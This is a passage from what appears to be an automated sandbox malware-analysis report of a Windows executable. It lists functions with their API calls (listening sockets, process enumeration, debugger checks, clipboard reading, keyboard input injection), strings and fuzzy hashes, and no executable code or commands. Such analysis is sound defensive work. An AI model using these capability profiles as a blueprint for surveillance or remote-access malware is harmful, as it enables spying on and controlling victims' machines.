                                                            • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                                                            Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000001,00000006), ref: 0046530D
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                            • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                            • closesocket.WSOCK32(00000000), ref: 00465377
                                                            • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                            • closesocket.WSOCK32(00000000), ref: 004653BD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$closesocket$bindlistensocket
                                                            • String ID:
                                                            • API String ID: 540024437-0
                                                            • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                            • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                            • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                            • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                            Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                            • API String ID: 0-2872873767
                                                            • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                            • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                            • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                            • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                            Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                            • __wsplitpath.LIBCMT ref: 00475644
                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                            • _wcscat.LIBCMT ref: 00475657
                                                            • __wcsicoll.LIBCMT ref: 0047567B
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                            • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                            • String ID:
                                                            • API String ID: 2547909840-0
                                                            • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                            • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                            • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                            • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                            Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                            • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                            • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                            • FindClose.KERNEL32(?), ref: 004525FF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                            • String ID: *.*$\VH
                                                            • API String ID: 2786137511-2657498754
                                                            • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                            • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                            • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                            • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                            Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                            • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                            • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID: pqI
                                                            • API String ID: 2579439406-2459173057
                                                            • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                            • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                            • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                            • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                            Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __wcsicoll.LIBCMT ref: 00433349
                                                            • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                            • __wcsicoll.LIBCMT ref: 00433375
                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __wcsicollmouse_event
                                                            • String ID: DOWN
                                                            • API String ID: 1033544147-711622031
                                                            • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                            • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                            • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                            • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                            Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                            • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                            • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                            • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: KeyboardMessagePostState$InputSend
                                                            • String ID:
                                                            • API String ID: 3031425849-0
                                                            • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                            • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                            • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                            • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                            Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 0047666F
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastinet_addrsocket
                                                            • String ID:
                                                            • API String ID: 4170576061-0
                                                            • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                            • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                            • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                            • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                            Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                            • IsWindowVisible.USER32 ref: 0047A368
                                                            • IsWindowEnabled.USER32 ref: 0047A378
                                                            • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                            • IsIconic.USER32 ref: 0047A393
                                                            • IsZoomed.USER32 ref: 0047A3A1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                            • String ID:
                                                            • API String ID: 292994002-0
                                                            • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                            • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                            • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                            • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                            Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                            • CoInitialize.OLE32(00000000), ref: 00478442
                                                            • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                            • CoUninitialize.OLE32 ref: 0047863C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                            • String ID: .lnk
                                                            • API String ID: 886957087-24824748
                                                            • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                            • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                            • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                            • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                            Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenClipboard.USER32(?), ref: 0046DCE7
                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                            • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                            • CloseClipboard.USER32 ref: 0046DD0D
                                                            • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                            • CloseClipboard.USER32 ref: 0046DD41
                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                            • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                            • CloseClipboard.USER32 ref: 0046DD99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                            • String ID:
                                                            • API String ID: 15083398-0
                                                            • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                            • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                            • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                            • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                            Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: U$\
                                                            • API String ID: 4104443479-100911408
                                                            • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                            • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                            • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                            • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                            Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                            • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                            • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                            • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                            Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                            • FindClose.KERNEL32(00000000), ref: 004339EB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirst
                                                            • String ID:
                                                            • API String ID: 48322524-0
                                                            • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                            • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                            • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                            • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                            Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
